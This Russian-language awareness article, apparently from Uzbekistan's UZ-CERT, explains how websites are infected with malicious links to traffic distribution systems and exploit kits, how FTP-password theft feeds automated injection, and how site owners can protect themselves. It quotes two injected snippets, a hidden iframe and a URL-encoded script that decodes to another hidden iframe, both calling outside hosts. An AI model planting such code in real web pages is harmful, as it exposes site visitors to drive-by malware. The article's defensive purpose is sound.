Чем опасен вредоносный код на веб-сайтах и методы борьбы с ним

uchastnik Данная статья ориентирована на пользователей сети Интернет и владельцев информационных ресурсов. Целью статьи является описание методов заражения веб-сайтов вредоносным кодом, возможными последствиями от этого и способы борьбы с вредоносным ПО.

Что же такое этот вредоносный код, откуда он берется и насколько это опасно?

Вредоносный код представляет собой ссылку на ресурс, содержащий вредоносное ПО. Наиболее встречаемые на сегодняшний день это либо поддельный антивирус (Fake Antivirus), либо модуль подмены выдачи поисковых запросов, либо ПО для рассылки спама. В некоторых случая вредоносное ПО может совмещать в себе функции кражи конфиденциальных данных с компьютера пользователя, к примеру, это могут быть пароли от административных интерфейсов управления веб-сайтами, пароли на ftp, аккаунты к онлайн сервисам.

Как правило, вредоносные ссылки встречаются двух видов:

1) Вредоносная ссылка ведет на систему распределения трафика (TDS). Система распределения трафика позволяет перенаправлять посетителя в зависимости от страны, операционной системы, браузера, используемого языка и других деталей на различные ресурсы. Ресурсы эти, в свою очередь, содержат вредоносное ПО именно для данной аудитории, либо данного, уязвимого ПО. Причем, в случае перехода по вредоносной ссылке с непредусмотренного злоумышленником браузера или версии операционной системы вы увидите либо просто пустой экран, либо, к примеру, поисковую страницу Google. Это немного затрудняет выявление вредоносного ПО. Тем не менее, при тщательном анализе можно понять логику системы и защититься от заражения.
2) Вредоносная ссылка ведет на «сплоиты» для популярных браузеров и программных продуктов. «Сплоиты» — это специально сформированные коды, использующие уязвимости в программном обеспечении для незаметной загрузки и исполнения на компьютере пользователя вредоносного ПО. В данном случае, определяется ПО пользователя и в случае его уязвимости происходит заражение.

Для сокрытия присутствия вредоносного кода на веб-сайте его шифруют, но встречаются случаи и открытого кода.

Пример открытой вредоносной ссылки: <iframe src=»http://bestlotron.cn/in.cgi?cocacola51″ width=1 height=1 style=»visibility: hidden»></iframe>

Пример шифрованной вредоносной ссылки: <script language=»javascript»> document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%74%6E%78%2E%6E%61%6D%65%2F%69%6E%2E%63%67%69%3F%33%27%20%77%69%64%74%68%3D%27%31%27%20%68%65%69%67%68%74%3D%27%31%27%20%73%74%79%6C%65%3D%27%76%69%73%69%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%3B%27%3E%3C%2F%69%66%72%61%6D%65%3E’));</script>

В первом примере, вредоносная ссылка заключенная в тег «iframe» представлена в открытом виде и адрес веб-сайта вполне читаем.

Проведем небольшой анализ структуры вредоносной ссылки:
имя домена — bestlotron.cn
скрипт — in.cgi (система распределения трафика SUTRA)
схема — cocacola51

Вредоносные ссылки с перенаправлением на систему распределения трафика в последнее время являются самыми встречаемыми. В данном случае злоумышленник, получив доступ к веб-сайту и внедрив вредоносную ссылку на систему распределения трафика на своем ресурсе, может управлять трафиком с этого веб-сайта. В схеме «cocacola51», которая указана в примере, может присутствовать не одно вредоносное ПО. Таким образом, система распределения трафика является всего лишь посредником между посетителем взломанного веб-сайта и вредоносным ПО злоумышленника.

Второй пример наглядно демонстрирует зашифрованную вредоносную ссылку. Как правило, для шифрования используются простые алгоритмы и практически в 99% такие ссылки без труда расшифровываются.

После расшифровки получаем следующий код:
<iframe src=’http://tnx.name/in.cgi?3′ width=’1′ height=’1′ style=’visibility: hidden;’></iframe>

Теперь мы можем наблюдать уже и адрес сайта, и знакомый нам по первому примеру скрипт системы распределения трафика со схемой 3.

Откуда же берется этот код на веб-сайтах и чем он может быть опасен?
Как правило, вручную веб-сайты уже не взламывают. Все давно автоматизировано. Для этих целей хакерами написано множество, как прикладных программ, так и серверных приложений. Самый распространенный процесс автоматизированного внедрения вредоносных ссылок на веб-сайты — это кража ftp паролей и дальнейшая обработка этих данных специализированным приложением Iframer. Работа Iframer’а проста — производить подключение к ресурсам по списку ftp аккаунтов, находить файлы по заданной маске, как правило, это файлы индексных страниц веб-сайтов, и внедрять в них уже готовый вредоносный код. Поэтому, после удаления кода, многие веб-сайты заражаются повторно, даже при смене всех паролей доступа, в том числе и на ftp. Причиной этому может служить наличие вируса для кражи паролей на компьютере, с которого осуществляется администрирование веб-сайтом.

Бывают случаи, когда владельцы веб-сайтов, на которых появляется вредоносный код, относятся несерьезно к данной проблеме. Согласен, вреда как такового самому ресурсу данный код не причиняет. Страдают лишь посетители зараженного веб-сайта. Но есть и другие стороны, на которые я хочу обратить внимание.

Веб-сайт, на котором находится вредоносный код, рано или поздно попадает во всевозможные базы разносчиков заразы – Malware site list, а также поисковые системы, такие как Google или Yandex, могут пометить зараженный веб-сайт как потенциально опасный. Убрать с такой базы свой ресурс при его попадании туда будет крайне сложно. Также, не исключена возможность рано или поздно получить «абузу» — жалобу от посетителей веб-сайта. В этом случае существует вероятность как блокирования доменного имени веб-сайта, так и блокирования его IP-адреса. Бывали случаи, когда из-за одного зараженного веб-сайта блокировались целые подсети.

Как же защититься от появления вредоносных кодов на своих ресурсах? Для этого необходимо выполнять ряд требований ИБ:

1) Установить на рабочий компьютер, с которого осуществляется администрирование веб-сайта антивирусное ПО, желательно лицензионное с ежедневно обновляемыми базами.
2) Установить и настроить межсетевой экран таким образом, чтобы весь трафик при работе с сетью проходил проверку и, в случае обращения к подозрительным хостам была возможность его блокирования.
3) Использовать сложные пароли на административные интерфейсы и доступы к сервисам ftp и ssh.
4) Не сохранять пароли в программах Total Commander, Far и других файловых менеджерах. Как правило, практически все троянские программы уже умеют захватывать эти данные и переправлять злоумышленнику.
5) Не открывать и не запускать полученные по электронной почте либо скачанные из сети Интернет файлы, предварительно не проверив их антивирусным ПО.
6) Обновлять программное обеспечение, установленное на компьютере. Своевременно устанавливать заплатки к операционным системам и обновлять прикладное ПО. Порой программы, которыми вы пользуетесь повседневно могут служить дырой в системе для проникновения вредоносного ПО. В частности Adobe Acrobat Reader, Flash Player, программы из пакета MS Office и др.

Если Вы соблюдаете все меры защиты, описанные выше, но обнаружили вредоносный код на своем ресурсе, виной этому может быть также и хостинг-провайдер, точнее настройки сервера на котором размещен ваш ресурс. В этом случае необходимо обратиться в службу поддержки вашего хостинг-провайдера и попросить их выявить и устранить причину инцидента.

Как Вы знаете, в Узбекистане в сентябре 2005 года по постановлению Президента страны была создана Служба реагирования на компьютерные инциденты UZ-CERT. Специалисты Службы помимо своих основных обязанностей также выполняют и работу по обнаружению вредоносных кодов на сайтах в национальной доменной зоне. Для этих целей был написан ряд прикладных программ для автоматизации основных моментов, но, конечно же, немаловажную роль играет и ручной просмотр подозрительных на заражение веб-сайтов. Порой удачно замаскированный вредоносный код подвергшийся «обфускации» — изменению структуры кода, автоматическими средствами обнаружить невозможно. Информация обо всех обнаруженных зараженных веб-сайтах публикуется на веб-сайте Службы, а также в разделе UZ-CERT на uForum.uz. Владельцы зараженных ресурсов получают оповещения, консультации и помощь для устранения угроз и дальнейшей защиты их систем. Мы искренне надеемся, что данная работа приносит пользу пользователям сети Интернет и помогает избежать массового заражения персональных компьютеров вредоносным ПО.

Orphus system